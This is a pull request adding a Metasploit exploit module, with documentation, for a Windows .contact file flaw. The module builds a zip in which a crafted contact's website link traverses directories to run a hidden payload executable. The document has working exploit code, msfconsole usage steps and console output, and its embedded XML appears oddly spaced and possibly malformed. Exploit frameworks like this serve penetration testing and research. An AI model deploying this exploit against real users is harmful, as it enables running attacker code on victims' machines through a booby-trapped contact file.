### PR TITLE
microsoft_windows_contact_remote_code_execution

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution.md
+++ b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution.md
@@ -1,0 +1,30 @@
+## Description
+
+This module allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
+executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
+Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
+Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
+The "." chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
+This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
+
+## Vulnerable Application
+
+Windows
+
+
+## Verification Steps
+
+1. `./msfconsole`
+2. `use exploit/windows/fileformat/`
+3. `set lport <lport>`
+4. `set lhost <lhost>`
+5. `exploit`
+
+## Scenarios
+
+### microsoft_windows_contact_remote_code_execution Tested on Windows 10.0.18282
+
+```
+msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > exploit
+[*] Creating 'John Smith.zip' 

--- a/modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb
+++ b/modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'fileutils'
+require 'rex/zip'
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Microsoft Windows Contact File Remote Code Execution',
+      'Description' => %q{
+        This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
+        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
+        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
+        Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
+        Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
+        The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
+        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
+      },
+      'Author'      =>
+        [ 'John Page (aka hyp3rlinx)', # Vuln discovery
+          'Brenner Little' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['EDB', '46188']
+        ],
+      'DisclosureDate' => 'Jan 17 2019', # According to https://www.exploit-db.com/exploits/46188
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Payload'        => {
+        'DisableNops' => true
+      },
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true
+      },
+      'Targets'        => [['Windows', { }]],
+      'DefaultTarget'  => 0
+      ))
+      register_options(
+      [
+        OptString.new('FILENAME', [false, 'The name of the malicius file.', 'msf.com']),
+        OptString.new('FULL_NAME', [false, 'The name of the Contact File', 'John Smith']),
+        OptString.new('ZIP', [false, 'The name of the zip File', 'John Smith.zip'])
+      ])
+  end
+  def exploit
+    fullname = "#{datastore['FULL_NAME']}"
+    exename = "#{datastore['FILENAME']}"
+    xml = %Q| << ? xml version = "1.0"
+    encoding = "UTF-8" ? >
+    <
+    c : contact c: Version = "1"
+    xmlns: c = "http://schemas.microsoft.com/Contact"
+    xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance"
+    xmlns: MSP2P = "http://schemas.microsoft.com/Contact/Extended/MSP2P" >
+    <
+    c: CreationDate > 2019 - 03 - 24 T02: 30: 47 Z < /c:CreationDate><c:Extended xsi:nil="true"/ >
+    <
+    c: ContactIDCollection > < c: ContactID c: ElementID = "bfea8bff-d916-4364-915e-0a893b879083" > < c: Value > da3b371c - c7a0 - 48 f0 - b08e - 41 b4cef85f93 < /c:Value></c: ContactID > < /c:ContactIDCollection><c:NameCollection><c:Name c:ElementID="c125e76a-50d9-40b0-aec1-6e4f7f85a648"><c:FormattedName>contact1</c: FormattedName > < c: GivenName > contact1 < /c:GivenName></c: Name > < /c:NameCollection><c:UrlCollection><c:Url c:ElementID="0e5978f5-082b-4ac9-96d0-f275dc4810d5"><c:Value>contact2</c: Value > < c: LabelCollection > < c: Label > Personal < /c:Label></c: LabelCollection > < /c:Url></c: UrlCollection > < c: PhotoCollection > < c: Photo c: ElementID = "48f0096f-a537-4bc9-a025-126163c55fde" > < c: LabelCollection > < c: Label > UserTile < /c:Label></c: LabelCollection > < /c:Photo></c: PhotoCollection > < /c:contact> |
+exe = generate_payload_exe
+    xml.gsub!(/contact1/, fullname);
+    xml.gsub!(/contact2/, "http.\\www." + exename);
+    zip = Rex::Zip::Archive.new
+    zip.add_file("/http/www." + exename, exe)
+    zip.add_file(fullname + ".contact", xml)
+    zip.save_to("#{datastore['ZIP']}")
+    print_status("Creating '#{datastore['ZIP']}'")
+  end
+end
+


### PR DESCRIPTION
 This module allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
    User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
    executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
    Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
    Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
    The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
    This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.

Start `msfconsole`
`use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
`set lhost <lhost>`
`set lport <lport>`
`exploit`
`[*] Creating 'John Smith.zip'`
